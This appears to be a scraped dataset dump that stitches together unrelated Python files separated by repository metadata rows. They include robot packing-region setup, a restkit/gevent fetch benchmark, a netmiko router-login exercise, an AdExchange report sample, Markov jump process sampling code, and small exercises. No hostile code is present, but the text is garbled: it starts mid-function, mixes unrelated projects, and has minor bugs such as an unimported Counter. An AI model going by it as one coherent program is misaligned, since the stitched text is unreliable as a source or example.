fixed_obj_poses = set_fixed_object_poses(env, x_extents, y_extents)
shelf_shapes, shelf_xs = generate_shelf_shapes()
shelf_regions = create_shelves(env, shelf_shapes, shelf_xs, 'table2')
obj_shapes = generate_shelf_obj_shapes()
shelf_objects = create_shelf_objs(env, obj_shapes)
shelf_obj_poses = generate_poses_and_place_shelf_objs(shelf_objects, shelf_regions, env)
for region_name, region in zip(shelf_regions.keys(), shelf_regions.values()):
region.name = region_name + '_shelf_region'
home_region_xy = [x_extents / 2.0, 0]
home_region_xy_extents = [x_extents, y_extents]
home_region = AARegion('home_region',
((-x_extents + x_extents / 2.0, x_extents + x_extents / 2.0), (-y_extents, y_extents)),
z=0.135, color=np.array((1, 1, 0, 0.25)))
loading_region_xy = [1.8, -6.7]
loading_region_xy_extents = [2.5, 1.85]
loading_region = AARegion('loading_region', ((loading_region_xy[0] - loading_region_xy_extents[0],
loading_region_xy[0] + loading_region_xy_extents[0]),
(loading_region_xy[1] - loading_region_xy_extents[1],
loading_region_xy[1] + loading_region_xy_extents[1])),
z=0.135, color=np.array((1, 1, 0, 0.25)))
bridge_region_name = 'bridge_region'
bridge_region_xy = [0.7, -4.1]
bridge_region_extents = [1, 1.0]
bridge_region = create_environment_region(bridge_region_name, bridge_region_xy, bridge_region_extents)
entire_region_xy = [x_extents / 2.0, -2.9]
entire_region_xy_extents = [x_extents, y_extents + 3.1]
entire_region = AARegion('entire_region', (
(-entire_region_xy_extents[0] + entire_region_xy[0], entire_region_xy_extents[0] + entire_region_xy[0]),
(-entire_region_xy_extents[1] + entire_region_xy[1], entire_region_xy_extents[1] + entire_region_xy[1])),
z=0.135, color=np.array((1, 1, 0, 0.25)))
packing_box_names = ['square_packing_box1', 'rectangular_packing_box1', 'square_packing_box2',
'rectangular_packing_box2', 'square_packing_box3', 'rectangular_packing_box3',
'square_packing_box4', 'rectangular_packing_box4']
packing_boxes = [env.GetKinBody(pname) for pname in packing_box_names]
place_objs_in_region(packing_boxes, loading_region, env)
place_objs_in_region([robot], loading_region, env)
open_gripper(robot)
"""
box_regions = {}
for box in packing_boxes:
box_region = AARegion.create_on_body(box)
box_region.color = (1., 1., 0., 0.25)
box_regions[box.GetName()] = box_region
if box == packing_boxes[0]:
xytheta = get_body_xytheta(box)
set_obj_xytheta([xytheta[0, 0], xytheta[0, 1], 0], box)
box_region.draw(env)
"""
temp_objects_to_pack = [body for body in env.GetBodies() if
body.GetName().find('box') == -1 and body.GetName().find('wall') == -1 and
body.GetName().find('sink') == -1 and body.GetName().find('kitchen') == -1 and
body.GetName().find('entrance') == -1 and body.GetName().find('pr2') == -1 and
body.GetName().find('floorwalls') == -1 and body.GetName().find('table') == -1 and
body.GetName().find('obst') == -1]
# packing boxes are packed in the order given in packing_boxes
# 1. packing boxes in the home
# 2. big objects in the truck
# 3. small objects in the box
# 4. shelf objects in the box
# 5. boxes in the truck
big_objects_to_pack = [body for body in env.GetBodies()
if body.GetName().find('chair') != -1 or body.GetName().find('shelf') != -1]
objects_to_pack = [obj for obj in temp_objects_to_pack if obj not in big_objects_to_pack]
objects = objects_to_pack + big_objects_to_pack
self.problem_config = {'shelf_objects': shelf_objects,
'packing_boxes': packing_boxes,
'objects_to_pack': objects_to_pack,
'big_objects_to_pack': big_objects_to_pack,
'home_region': home_region,
'loading_region': loading_region,
'entire_region': entire_region,
'entire_region_xy': entire_region_xy,
'entire_region_extents': entire_region_xy_extents,
'bridge_region': bridge_region,
'bridge_region_xy': bridge_region_xy,
'bridge_region_extents': bridge_region_extents,
'env': env,
'loading_region_xy': loading_region_xy,
'loading_region_extents': loading_region_xy_extents,
'home_region_xy': home_region_xy,
'home_region_extents': home_region_xy_extents,
'shelf_regions': shelf_regions,
'objects': objects}
# import pdb;pdb.set_trace()
"""
# for corl presentation purpose
for p in packing_boxes: set_color(p, [0, 0, 0])
set_color('rectangular_packing_box3', [1, 0, 0])
set_color('rectangular_packing_box1', [0, 1, 0])
set_color('rectangular_packing_box4', [0, 1, 1])
"""
def get_problem_config(self):
return self.problem_config
| [
"beomjoon@mit.edu"
] | beomjoon@mit.edu |
e69e9f01a37105c49a7d07b7d0f7bf4f565436b7 | 8e3a02a5e104a14a1aa3ba3ba0f05596a9f73757 | /examples/test_gevent.py | 4789c8a0d20458c547189e187018ec4dcc5f1168 | [
"MIT"
] | permissive | jengdal/restkit | 9f114f0f7ded7217cb0c9d405dd1af469c9a918a | e32ff0c3d72415c998353644313bbc02805faa6c | refs/heads/master | 2021-01-18T06:02:55.463294 | 2012-07-19T10:39:32 | 2012-07-19T10:39:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 785 | py | import timeit
from gevent import monkey; monkey.patch_all()
import gevent
from restkit import *
from restkit.conn import Connection
from socketpool import ConnectionPool
#set_logging("debug")
pool = ConnectionPool(factory=Connection, backend="gevent")
urls = [
"http://yahoo.fr",
"http://google.com",
"http://friendpaste.com",
"http://benoitc.io",
"http://couchdb.apache.org"]
allurls = []
for i in range(10):
allurls.extend(urls)
def fetch(u):
r = request(u, follow_redirect=True, pool=pool)
print "RESULT: %s: %s (%s)" % (u, r.status, len(r.body_string()))
def extract():
jobs = [gevent.spawn(fetch, url) for url in allurls]
gevent.joinall(jobs)
t = timeit.Timer(stmt=extract)
print "%.2f s" % t.timeit(number=1)
| [
"bchesneau@gmail.com"
] | bchesneau@gmail.com |
80b5d59d19dcfbe334c10f0bf90f3ced0118346d | 1804187f39dd6004250933b35ba9ce24297f32a5 | /practice_8_13.py | a00c9a29c89dc4a2064682f2e727369ac0a1010a | [] | no_license | xiaomengxiangjia/Python | ecd2e3e8576364f15482669cb75b52b8790543f5 | 7f52a33d7956068d26347cf34d35c953b945a635 | refs/heads/master | 2020-03-20T23:01:09.981928 | 2018-08-23T09:04:53 | 2018-08-27T05:46:38 | 137,825,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | def build_profile(first, last, **user_info):
profile = {}
profile['first_name'] = first
profile['last_name'] = last
for key, value in user_info.items():
profile[key] = value
return profile
user_profile = build_profile('benjiming','frankling',
location = 'chengdu',
filed = 'computer science and technology',
dream = 'study')
print(user_profile)
| [
"645334483@qq.com"
] | 645334483@qq.com |
1b7d543aa7cbb7b19a285e7d31a77ff3a6c069a8 | dbfc8ca4dbdef6002b0738dd4c30d569eb9e36c3 | /test/metadata/inbound/plugins/test_plugins_1000_0006_srtm.py | 2d729241c31eb65866a3e9474c3784cc474aaa64 | [] | no_license | GISdeveloper2017/imetadata | da32e35215cc024a2e5d244ee8afc375c296550d | 58516401a054ff0d25bfb244810a37838c4c8cf6 | refs/heads/master | 2023-03-26T06:38:28.721553 | 2021-03-06T09:32:06 | 2021-03-06T09:32:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,698 | py | # -*- coding: utf-8 -*-
# @Time : 2020/12/4 09:05
# @Author : 王西亚
# @File : test_plugins_aaa.py
import allure
import pytest
import settings
from imetadata.base.c_file import CFile
from imetadata.base.c_utils import CUtils
from imetadata.business.metadata.base.fileinfo.c_dmFilePathInfoEx import CDMFilePathInfoEx
from imetadata.business.metadata.base.plugins.c_plugins import CPlugins
from imetadata.business.metadata.inbound.plugins.dir.plugins_1000_0006_srtm import plugins_1000_0006_srtm
from test.metadata.inbound.plugins.plugins_test_base import Plugins_Test_Base
@allure.feature("天津测绘SRTM") # 模块标题
class Test_plugins_1000_0006_srtm(Plugins_Test_Base):
def create_plugins(self, file_info: CDMFilePathInfoEx = None) -> CPlugins:
return plugins_1000_0006_srtm(file_info)
def test_file_info_list(self):
return [
{
self.Name_Test_File_Type: self.FileType_Dir,
self.Name_Test_file_path: '202008{0}srtm'.format(CFile.sep()),
self.Name_Test_object_confirm: self.Object_Confirm_IKnown,
self.Name_Test_object_name: 'srtm'
}
]
def init_before_test(self):
plugins_info = self.create_plugins().get_information()
plugins_catalog = CUtils.dict_value_by_name(plugins_info, CPlugins.Plugins_Info_Catalog_Title, '')
self._test_file_root_path = settings.application.xpath_one(self.Path_Setting_Dir_Test_Data, '')
self._test_file_parent_path = CFile.join_file(
settings.application.xpath_one(self.Path_Setting_Dir_Test_Data, ''),
plugins_catalog
)
if __name__ == '__main__':
pytest.main()
| [
"18437918096@163.COM"
] | 18437918096@163.COM |
7b795505b76f7218da50a6a9bf53221773d8cfae | 4738be4be8cda375e33ef606dbe82998d6e60bef | /common_nlp/word_histogram_comparison.py | 9cb68293cb5cf094917ad90f252498d2c754186e | [
"MIT"
] | permissive | Arieugon/Pesquisas | 39723d6ee642d50708f4a883b8d13faf5d018c3c | 87e3923c571d44774c36d4bc54e444cb1003b43b | refs/heads/master | 2023-01-21T10:23:53.645736 | 2020-12-02T19:23:48 | 2020-12-02T19:23:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,920 | py | from scipy.spatial import distance as dist
try:
from textNormalization import textNormalization
except:
from common_nlp.textNormalization import textNormalization
import numpy as np
class word_histogram_comparison():
def __init__(self):
self.scipy_methods = {
"Euclidean" : dist.euclidean,
"Manhattan" : dist.cityblock,
"Chebysev" : dist.chebyshev
}
def compare_two_hist(self,histA, histB, method):
return method(histA, histB)
def compare_all_all(self,texts, method):
results = {}
for i in range(len(texts)-1):
textA = texts[i]
other_texts = texts[:i] + texts[i+1:]
results[textA[0]] = self.compare_one_all(textA, other_texts, method)
return results
def compare_one_all(self,textA, texts, method):
txt_nrm = textNormalization()
results = {}
id_A, text_A = textA
histA = txt_nrm.text_to_hist(text_A)
for id_t, text_t in texts:
histogram_A_aux = []
histogram_T_aux = []
histogram_t = txt_nrm.text_to_hist(text_t)
for k,v in histA.items():
if k in histogram_t:
histogram_A_aux.append(v)
histogram_T_aux.append(histogram_t[k])
results[id_t] = method(histogram_A_aux,histogram_T_aux)
return results
def texts_to_mean_hist(self, texts, method):
aux_hist = Counter()
final_hist = {}
txt_nrm = textNormalization()
for t in texts:
aux_hist += txt_nrm.text_to_hist(t)
aux_hist = dict(aux_hist)
texts_size = len(texts)
for k,v in aux_hist.items():
final_hist[k] = v/texts_size
return final_hist
def mean_hist_dist_texts(self, texts, method):
mean_hist = 0
sd_hist = []
for i in range(len(texts)-1):
textA = texts[i]
other_texts = texts[:i] + texts[i+1:]
mean_aux = 0
for j in range(len(other_texts)):
mean_aux += self.compare_two_hist(textA,other_texts[j],method)
mean_aux = mean_aux/len(other_texts)
mean_hist += mean_aux
sd_hist.append(mean_aux)
return (mean_hist/len(texts),np.std(sd_hist))
| [
"danilopcarlotti@gmail.com"
] | danilopcarlotti@gmail.com |
72565b8fc05ad482fa524703a4d1c515750710d6 | b66bf5a58584b45c76b9d0c5bf828a3400ecbe04 | /week-03/day-1/hello_dictionary.py | 4019dd86864bc5aa97b59c9b4cbf5f586bf557d3 | [] | no_license | greenfox-velox/szepnapot | 1196dcb4be297f12af7953221c27cd1a5924cfaa | 41c3825b920b25e20b3691a1680da7c10820a718 | refs/heads/master | 2020-12-21T08:11:41.252889 | 2016-08-13T10:07:15 | 2016-08-13T10:07:15 | 58,042,932 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 585 | py | import requests
import re
from bs4 import BeautifulSoup
r = requests.get('http://pocketcultures.com/2008/10/30/say-hello-in-20-languages/')
raw_html = r.text
soup = BeautifulSoup(raw_html, 'html.parser')
strongs = soup("strong")
GREETINGS = {}
hellos = r'\d+\.\s([A-Z]+\s?[A-Z]+.).?'
language = r'\d+.+\–\s([A-Za-z\s()]+)'
for i in strongs:
i = i.text
print(i)
# if i[0].isdigit():
# hello_parts = re.match(hellos, i).group(1)
# # hy = (''.join(hello_parts)).capitalize()
# print(hello_parts)
# # country = re.match(language, i).group(0)
# # print(country)
| [
"silentpocok@gmail.com"
] | silentpocok@gmail.com |
97070ee6a3ede702c56f5d8433c185084a2ec962 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_201/2321.py | cef4f2742fcb1a85496d41097792834162b31ccd | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | from heapq import *
t = int(input()) # read a line with a single integer
for i in range(1, t + 1):
N, people = [int(s) for s in input().split(" ")]
h = []
heappush(h, 0)
while people:
people -= 1
biggestSpace = N - heappop(h)
if biggestSpace % 2 == 1:
if people == 0:
result = [int(biggestSpace/2)]
heappush(h, N - int(biggestSpace/2))
heappush(h, N - int(biggestSpace/2))
else:
if people == 0:
result = [(int(biggestSpace/2) - 1), int(biggestSpace/2)]
heappush(h, N - (int(biggestSpace/2) - 1))
heappush(h, N - int(biggestSpace/2))
print("Case #{}: {} {}".format(i, max(result), min(result))) | [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
d924bb3f2ebc12d7519019fe62a01ce3fb6635e0 | dac960516a8b99ec7f0727282c4a9f1e58dcaa22 | /python/samples/v1_x/list_performance_report.py | cc73d135bcc413e5a63cb99be4fec1ea3518e208 | [
"Apache-2.0"
] | permissive | Baldri/googleads-adxbuyer-examples | 948da55e981cb85bfda1e4027beb482f29d1d87a | 285469fe1fff28416d0477c22e59746525694988 | refs/heads/master | 2023-02-22T18:50:29.166146 | 2020-04-17T20:52:22 | 2020-04-17T20:52:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,479 | py | #!/usr/bin/python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example lists the given account's Performance Report."""
import argparse
import pprint
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
from googleapiclient.errors import HttpError
import samples_util
DEFAULT_ACCOUNT_ID = 'INSERT_ACCOUNT_ID'
DEFAULT_END_DATE_TIME = 'INSERT_END_DATE_TIME_HERE' # YYYY-MM-DD
DEFAULT_START_DATE_TIME = 'INSERT_START_DATE_TIME_HERE' # YYYY-MM-DD
DEFAULT_MAX_PAGE_SIZE = samples_util.MAX_PAGE_SIZE
def main(ad_exchange_buyer, account_id, start_date_time, end_date_time,
max_results):
try:
# Construct and execute the request.
report = ad_exchange_buyer.performanceReport().list(
accountId=account_id,
startDateTime=start_date_time,
endDateTime=end_date_time,
maxResults=max_results).execute()
print('Successfully retrieved the report.')
pprint.pprint(report)
except HttpError as e:
print(e)
if __name__ == '__main__':
# Optional arguments; overrides default values if set.
parser = argparse.ArgumentParser(description='Retrieves list of performance '
'metrics.')
parser.add_argument('-a', '--account_id', required=False, type=int,
default=DEFAULT_ACCOUNT_ID,
help=('The integer id of the account you\'re retrieving '
'the report for.'))
parser.add_argument('-s', '--start_date_time', required=False,
default=DEFAULT_START_DATE_TIME,
help=('The start time of the report in ISO 8601 '
'timestamp format using UTC. (YYYY-MM-DD)'))
parser.add_argument('-e', '--end_date_time', required=False,
default=DEFAULT_END_DATE_TIME,
help=('The end time of the report in ISO 8601 timestamp '
'format using UTC. (YYYY-MM-DD)'))
parser.add_argument('-m', '--max_results', required=False, type=int,
default=DEFAULT_MAX_PAGE_SIZE,
help=('The maximum number of entries returned on one '
'result page.'))
args = parser.parse_args()
if args.account_id:
ACCOUNT_ID = args.account_id
START_DATE_TIME = args.start_date_time
END_DATE_TIME = args.end_date_time
MAX_RESULTS = args.max_results
else:
ACCOUNT_ID = int('INSERT_ACCOUNT_ID')
START_DATE_TIME = 'YYYY-MM-DD' # Insert startDateTime here.
END_DATE_TIME = 'YYYY-MM-DD' # Insert endDateTime here.
MAX_RESULTS = samples_util.MAX_PAGE_SIZE
try:
service = samples_util.GetService()
except IOError as ex:
print(f'Unable to create adexchangebuyer service - {ex}')
print('Did you specify the key file in samples_util.py?')
sys.exit(1)
main(service, ACCOUNT_ID, START_DATE_TIME, END_DATE_TIME, MAX_RESULTS)
| [
"msaniscalchi@users.noreply.github.com"
] | msaniscalchi@users.noreply.github.com |
63cccd1521fb66bffc03c4ee7187a82d5af2de60 | 4c10305652193f7b1df8af4dfe28742910f07fcf | /hw/ip/otbn/util/rig/snippet_gen.py | 50d736d4072bbf9555a1219d46d06987be6eb924 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | jake-ke/opentitan | fc162fd3ec2dc3dff7cec6745379ea5aa3d7a5e0 | a7b16226ce13752896a71399910e39c7a5bda88a | refs/heads/master | 2023-07-05T12:38:49.186899 | 2021-01-21T22:38:13 | 2021-01-22T02:16:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,802 | py | # Copyright lowRISC contributors.
# Licensed under the Apache License, Version 2.0, see LICENSE for details.
# SPDX-License-Identifier: Apache-2.0
'''A module defining a base class for a snippet generator.
The generators in the ./gens/ subdirectory all derive from this class. To
actually generate some snippets, use the wrapper in snippet_gens.py.
'''
from typing import Callable, Optional, Tuple
from shared.insn_yaml import Insn, InsnsFile
from .program import Program
from .model import Model
from .snippet import Snippet
# A continuation type that allows a generator to recursively generate some more
# stuff.
GenCont = Callable[[Model, Program], Optional[Tuple[Snippet, Model]]]
# The return type of a single generator. This is a tuple (snippet, model).
# snippet is a generated snippet. If the program is done (i.e. every execution
# ends with ecall) then model is None. Otherwise it is a Model object
# representing the state of the processor after executing the code in the
# snippet(s).
GenRet = Tuple[Snippet, Optional[Model]]
class SnippetGen:
'''A parameterised sequence of instructions
These can be added to the instructions generated so far for a given random
binary.
'''
def gen(self,
cont: GenCont,
model: Model,
program: Program) -> Optional[GenRet]:
'''Try to generate instructions for this type of snippet.
On success, inserts the instructions into program, updates the model,
and returns a GenRet tuple. See comment above the type definition for
more information.
On failure, leaves program and model unchanged and returns None. There
should always be at least one snippet generator with positive weight
(see pick_weight below) that succeeds unconditionally. This will be the
ecall generator. Failure is interpreted as "this snippet won't work
with the current program state", but the generator may be retried
later.
The cont argument is a continuation, used to call out to more
generators in order to do recursive generation. It takes a (mutable)
model and program and picks a sequence of instructions. The paths
through the generated code don't terminate with an ECALL but instead
end up at the resulting model.pc.
'''
raise NotImplementedError('gen not implemented by subclass')
def pick_weight(self,
model: Model,
program: Program) -> float:
'''Pick a weight by which to multiply this generator's default weight
This is called for each generator before we start trying to generate a
snippet for a given program and model state. This can be used to
disable a generator when we know it won't work (if model.fuel is too
small, for example).
It can also be used to alter weights depending on where we are in the
program. For example, a generator that generates ecall to end the
program could decrease its weight when size is large, to avoid
generating tiny programs by accident.
The default implementation always returns 1.0.
'''
return 1.0
def _get_named_insn(self, insns_file: InsnsFile, mnemonic: str) -> Insn:
'''Get an instruction from insns_file by mnemonic
This is used for specialized snippets that need to generate a specific
instruction and wraps the error handling for when someone has removed
the instruction from the file.
'''
insn = insns_file.mnemonic_to_insn.get(mnemonic.lower())
if insn is None:
raise RuntimeError('No {} instruction in instructions file.'
.format(mnemonic.upper()))
return insn
| [
"rswarbrick@gmail.com"
] | rswarbrick@gmail.com |
4860167b800f06c9498077979e99c03567633e94 | 9737a5e2cfe5521bb9731a356a7639d0dc3692de | /Exercises/week_2_netmiko/exercise6d.py | 88af3c6a3aa08b2bb55ebe967bd9c0ba844d1c91 | [] | no_license | akushnirubc/pyneta | 5c53cbcf42e2450ce6a2d7e6591d671661e84ba0 | ee68205c0b91974ea1cd79b8c06c36ae083fb02c | refs/heads/main | 2023-06-18T18:02:56.242732 | 2021-07-13T21:43:51 | 2021-07-13T21:43:51 | 358,647,513 | 0 | 0 | null | 2021-05-24T21:39:18 | 2021-04-16T15:45:34 | JavaScript | UTF-8 | Python | false | false | 1,272 | py | # Using SSH and netmiko connect to the Cisco4 router. In your device definition, specify both an 'secret' and a 'session_log'. Your device definition should look as follows:
# password = getpass()
# device = {
# "host": "cisco4.lasthop.io",
# "username": "pyclass",
# "password": password,
# "secret": password,
# "device_type": "cisco_ios",
# "session_log": "my_output.txt",
# }
# Execute the following sequence of events using Netmiko:
# Use the write_channel() method to send the 'disable' command down the SSH channel.
# Note, write_channel is a low level method so it requires that you add a newline to the end of your 'disable' command.
from netmiko import ConnectHandler
from getpass import getpass
password = getpass()
device = {
"host": "cisco4.lasthop.io",
"username": "pyclass",
"password": password,
"secret": password,
"device_type": "cisco_ios",
"session_log": "my_output.txt",
}
net_connect = ConnectHandler(**device)
print("\nExit priviledged exec (disable), Current prompt")
net_connect.write_channel("disable\n")
print ("\n>>>>>>>")
# print("Config mode check: {}".format(net_connect.exit_config_mode())
print("Current Prompt: {}".format(net_connect.find_prompt()))
print()
net_connect.disconnect() | [
"alex.kushnir@ubc.ca"
] | alex.kushnir@ubc.ca |
40355038bf589f532800b1282ca963ededb8e481 | bf0c13d412a7021b299c5e0622e63e72172cf725 | /week1/Hackerrank/easy/finding_percentage.py | 559579e9933496e2810d3b9115a6d038eedc180f | [] | no_license | Alibek120699/BFDjango | 765e734e925041947f607a1d15228309dfa3e647 | eac06c317551c561ffccb44750862972ae11dea3 | refs/heads/master | 2022-12-01T15:49:39.402815 | 2020-04-19T21:09:39 | 2020-04-19T21:09:39 | 233,657,360 | 0 | 0 | null | 2022-11-22T05:49:56 | 2020-01-13T17:50:13 | Python | UTF-8 | Python | false | false | 377 | py | if __name__ == '__main__':
n = int(input())
student_marks = {}
for _ in range(n):
name, *line = input().split()
scores = list(map(float, line))
student_marks[name] = scores
query_name = input()
marks = student_marks[query_name]
total = 0
for i in marks:
total += i
res = total/len(marks)
print('%.2f' % res)
| [
"sayakalibek1@gmail.com"
] | sayakalibek1@gmail.com |
4a95586f5e04b017913bbc56e25ca916b195e870 | 9322c270beaf1019328bf14c836d167145d45946 | /raoteh/sampler/_sample_mjp.py | fdab6bbbe2bc9dda67fb576bd4a2b27627ccec95 | [] | no_license | argriffing/raoteh | 13d198665a7a3968aad8d41ddad12c08d36d57b4 | cdc9cce8fdad0a79dbd90dfcdec6feece8fc931f | refs/heads/master | 2021-01-22T19:41:25.828133 | 2014-03-10T22:25:48 | 2014-03-10T22:25:48 | 10,087,018 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,172 | py | """
Rao-Teh samples of MJP trajectories on trees.
"""
from __future__ import division, print_function, absolute_import
import numpy as np
import networkx as nx
from raoteh.sampler import _util, _mjp
__all__ = []
#TODO move more stuff from _sampler.py into this module
def resample_poisson(T, state_to_rate, root=None):
"""
Parameters
----------
T : weighted undirected acyclic networkx graph
Weighted tree whose edges are annotated with states.
In other words, this is an MJP trajectory.
state_to_rate : dict
Map the state to the expected number of poisson events
per edge weight.
root : integer, optional
Root of the tree.
Returns
-------
T_out : weighted undirected acyclic networkx graph
Weighted tree without state annotation.
"""
# If no root was specified then pick one arbitrarily.
if root is None:
root = _util.get_first_element(T)
# Define the next node.
next_node = max(T) + 1
# Build the list of weighted edges.
weighted_edges = []
for a, b in nx.bfs_edges(T, root):
weight = T[a][b]['weight']
state = T[a][b]['state']
rate = state_to_rate[state]
prev_node = a
total_dwell = 0.0
while True:
dwell = np.random.exponential(scale = 1/rate)
if total_dwell + dwell > weight:
break
total_dwell += dwell
mid_node = next_node
next_node += 1
weighted_edges.append((prev_node, mid_node, dwell))
prev_node = mid_node
weighted_edges.append((prev_node, b, weight - total_dwell))
# Return the resampled tree with poisson events on the edges.
T_out = nx.Graph()
T_out.add_weighted_edges_from(weighted_edges)
return T_out
def get_uniformized_transition_matrix(Q,
uniformization_factor=None, omega=None):
"""
Parameters
----------
Q : directed weighted networkx graph
Rate matrix.
uniformization_factor : float, optional
A value greater than 1.
omega : float, optional
The uniformization rate.
Returns
-------
P : directed weighted networkx graph
Transition probability matrix.
"""
if (uniformization_factor is not None) and (omega is not None):
raise ValueError('the uniformization factor and omega '
'should not both be provided')
# Compute the total rates.
total_rates = _mjp.get_total_rates(Q)
# Compute omega if necessary.
if omega is None:
if uniformization_factor is None:
uniformization_factor = 2
omega = uniformization_factor * max(total_rates.values())
# Construct a uniformized transition matrix from the rate matrix
# and the uniformization rate.
P = nx.DiGraph()
for a in Q:
if Q[a]:
weight = 1.0 - total_rates[a] / omega
P.add_edge(a, a, weight=weight)
for b in Q[a]:
weight = Q[a][b]['weight'] / omega
P.add_edge(a, b, weight=weight)
# Return the uniformized transition matrix.
return P
| [
"argriffi@ncsu.edu"
] | argriffi@ncsu.edu |
d214dc2ec55b92f64a7b41190073cca7608a26c1 | d9a22d4dcdfc0c28176c0e8afd784b30d275597e | /multi/result_commands.py | 714185c8a5cd3ed163af2c3f3d34ece8aa591eaa | [] | no_license | jlec/relax | fda1b3ff77be0afc21c2e6cc52348ae7635cd07a | c317326ddeacd1a1c608128769676899daeae531 | refs/heads/master | 2016-09-08T00:27:57.256090 | 2015-02-10T12:24:55 | 2015-02-10T12:24:55 | 30,596,131 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,870 | py | ###############################################################################
# #
# Copyright (C) 2007 Gary S Thompson (https://gna.org/users/varioustoxins) #
# Copyright (C) 2008-2013 Edward d'Auvergne #
# #
# This file is part of the program relax (http://www.nmr-relax.com). #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
# Module docstring.
"""Module containing command objects sent from the slaves back to the master."""
# Python module imports.
import sys
# multi module imports.
from multi.misc import Result
class Result_command(Result):
"""A general result command - designed to be subclassed by users.
This is a general result command from a Slave command that will have its run() method called on
return to the master processor.
@see: multi.processor.Slave_command.
"""
def __init__(self, processor, completed, memo_id=None):
#TODO: check this method is documnted by its parent
super(Result_command, self).__init__(processor=processor, completed=completed)
self.memo_id = memo_id
def run(self, processor, memo):
"""The run method of the result command.
This method will be called when the result command is processed by the master and should
carry out any actions the slave command needs carried out on the master (e.g. save or
register results).
@see: multi.processor.Processor.
@see: multi.processor.Slave_command.
@see: multi.memo.Memo.
@param processor: The master processor that queued the original Slave_command.
@type processor: Processor instance
@param memo: A memo that was registered when the original slave command was placed on
the queue. This provides local storage on the master.
@type memo: Memo instance or None
"""
pass
class Batched_result_command(Result_command):
def __init__(self, processor, result_commands, io_data=None, completed=True):
super(Batched_result_command, self).__init__(processor=processor, completed=completed)
self.result_commands = result_commands
# Store the IO data to print out via the run() method called by the master.
self.io_data = io_data
def run(self, processor, batched_memo):
"""The results command to be run by the master.
@param processor: The processor instance.
@type processor: Processor instance
@param batched_memo: The batched memo object.
@type batched_memo: Memo instance
"""
# First check that we are on the master.
processor.assert_on_master()
# Unravel the IO stream data on the master in the correct order.
for line, stream in self.io_data:
if stream == 0:
sys.stdout.write(line)
else:
sys.stderr.write(line)
if batched_memo != None:
msg = "batched result commands shouldn't have memo values, memo: " + repr(batched_memo)
if batched_memo != None:
msg = "batched result commands shouldn't have memo values, memo: " + repr(batched_memo)
raise ValueError(msg)
for result_command in self.result_commands:
processor.process_result(result_command)
class Null_result_command(Result_command):
"""An empty result command.
This command should be returned from slave_command if no other Result_command is returned. This
allows the queue processor to register that the slave processor has completed its processing and
schedule new Slave-commands to it.
"""
def __init__(self, processor, completed=True):
super(Null_result_command, self).__init__(processor=processor, completed=completed)
class Result_exception(Result_command):
"""Return and raise an exception from the salve processor."""
def __init__(self, processor, exception, completed=True):
"""Initialise the result command with an exception.
@param exception: An exception that was raised on the slave processor (note the real
exception will be wrapped in a Capturing_exception.
@type exception: Exception instance
"""
super(Result_exception, self).__init__(processor=processor, completed=completed)
self.exception = exception
def run(self, processor, memo):
"""Raise the exception from the Slave_processor."""
raise self.exception
| [
"bugman@b7916896-f9f9-0310-9fe5-b3996d8957d5"
] | bugman@b7916896-f9f9-0310-9fe5-b3996d8957d5 |
e8bcf51f6b4bea52914dcb421fdbe9d4c297c1e5 | 10b3d1ce02eaa4908dc16ca378ddfb1955b2d625 | /MV3D_TF_release/tests/private/test_save_pretrained_params_from_npy.py | eb62bf9b4a8afd458e9a0bb684262a62725bed00 | [
"MIT",
"BSD-3-Clause"
] | permissive | ZiningWang/Sparse_Pooling | 7281aa0d974849eac8c48faa5ba08519b091ef6e | f46882832d0e2fed5ab4a0af15cead44fd3c6faa | refs/heads/master | 2023-05-26T08:47:16.232822 | 2023-05-20T08:39:11 | 2023-05-20T08:39:11 | 141,640,800 | 56 | 21 | null | null | null | null | UTF-8 | Python | false | false | 621 | py | #This is for transforming the .npy file saved in python2 to python3
import numpy as np
import os
import scipy.io
params = np.load('mscnn_ped_cyc_kitti_trainval_2nd_iter_15000.npy').item()
#make matlab file
scipy.io.savemat('mscnn_ped_cyc_kitti_trainval_2nd_iter_15000.mat',params)
''' #make txt files(failed)
os.mkdir('npy_params_csv')
for layer_name in params.keys():
layer = params[layer_name]
if type(layer) is dict:
os.mkdir(layer_name)
for layer_param_name in layer:
layer_param = layer[layer_param_name]
np.savetxt(layer_param_name+'.csv',layer_param)
else:
np.savetxt(layer_name+'.csv',layer)
'''
| [
"kiwoo.shin@berkeley.edu"
] | kiwoo.shin@berkeley.edu |
